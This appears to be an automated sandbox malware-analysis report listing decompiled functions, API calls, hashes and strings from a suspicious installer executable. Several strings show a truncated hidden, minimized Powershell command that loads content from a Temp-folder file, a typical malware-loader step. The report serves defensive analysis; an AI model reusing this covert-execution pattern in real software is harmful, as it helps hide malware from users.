Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

Function 00404367 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040413E), ref: 00404371

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
Instruction ID: bc9b5adeae0d36b04141253452f110da710a6babf688c590b829c7787f218d6b
Opcode Fuzzy Hash: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
Instruction Fuzzy Hash: 34A002B65445009BCE119F50DF05805BA71F7E47417518479A155510348A354561EB19

Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405414: lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00402EEC,00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47

Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E

Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 1d51c276210597c3e67e48e6bcdb0ac064f41ec5facf35c800a418dd96202cc3
Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
Opcode Fuzzy Hash: 1d51c276210597c3e67e48e6bcdb0ac064f41ec5facf35c800a418dd96202cc3
Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE

Non-executed Functions

Function 00404D90 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DA8
GetDlgItem.USER32(?,00000408), ref: 00404DB3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
LoadBitmapW.USER32(0000006E), ref: 00404E10
SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
DeleteObject.GDI32(00000000), ref: 00404E86
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
ShowWindow.USER32(?,00000005), ref: 00404FE0
SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
ImageList_Destroy.COMCTL32(?), ref: 004051B0
GlobalFree.KERNEL32(?), ref: 004051C0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
ShowWindow.USER32(?,00000000), ref: 0040535F
GetDlgItem.USER32(?,000003FE), ref: 0040536A
ShowWindow.USER32(00000000), ref: 00405371

Strings

M, xrefs: 00404F3A
N, xrefs: 0040501B
, xrefs: 00405349

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58

Function 00404814 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404863
SetWindowTextW.USER32(00000000,?), ref: 0040488D
SHBrowseForFolderW.SHELL32(?), ref: 0040493E
CoTaskMemFree.OLE32(00000000), ref: 00404949
lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 0040497B
lstrcatW.KERNEL32(?,004281E0), ref: 00404987
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999

Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09

Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77

Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D

Strings

A, xrefs: 00404937
(7B, xrefs: 00404911
C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 00404964
"Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin, xrefs: 0040482D

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin$(7B$A$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles
API String ID: 2624150263-1474594648
Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D

Function 00405ABE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405AE7
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B2F
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B52
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B58
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B68
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
FindClose.KERNEL32(00000000), ref: 00405C17

Strings

\*.*, xrefs: 00405B29
"C:\Users\user\Desktop\REnBTVfW8q.exe", xrefs: 00405ABE
0WB, xrefs: 00405B17
C:\Users\user\AppData\Local\Temp\, xrefs: 00405ACC

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1917594349
Opcode ID: 8f71284f2044867b201ebea1fcb177468b9962e057799c0ca1b0d7b92889968e
Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
Opcode Fuzzy Hash: 8f71284f2044867b201ebea1fcb177468b9962e057799c0ca1b0d7b92889968e
Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D

Strings

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 004021BD

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles
API String ID: 542301482-720499180
Opcode ID: 14088fa5b419b92bfb42c09fedcea510d9207fefc18800776c52cb691061a0f9
Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
Opcode Fuzzy Hash: 14088fa5b419b92bfb42c09fedcea510d9207fefc18800776c52cb691061a0f9
Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44

Function 004044E2 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
GetDlgItem.USER32(?,000003E8), ref: 00404594
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
GetSysColor.USER32(?), ref: 004045C2
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
lstrlenW.KERNEL32(?), ref: 004045E3
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
GetDlgItem.USER32(?,0000040A), ref: 0040465E
SendMessageW.USER32(00000000), ref: 00404665
GetDlgItem.USER32(?,000003E8), ref: 00404690
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
SetCursor.USER32(00000000), ref: 004046E4
LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
SetCursor.USER32(00000000), ref: 00404700
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741

Strings

N, xrefs: 0040467E
YD@, xrefs: 004046EC

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$YD@
API String ID: 3103080414-2400581618
Opcode ID: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
Instruction ID: b733f22c3e4a4344af423a89e947fb2470a434e6d87e1c723dfed1fecd84da00
Opcode Fuzzy Hash: 777072e4300f85645cf7ffde5545d8883defabb32dd208014d98b1e23baa6229
Instruction Fuzzy Hash: E16172B1A00209BFDB109F60DD85AAA7B69FB85354F00813AFB05BB1E0D7789951CF58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00405FFC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040

Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
wsprintfA.USER32 ref: 0040607B
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
GlobalFree.KERNEL32(00000000), ref: 00406164
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B

Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8

Strings

[Rename], xrefs: 004060E5, 004060F7
%ls=%ls, xrefs: 00406071

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
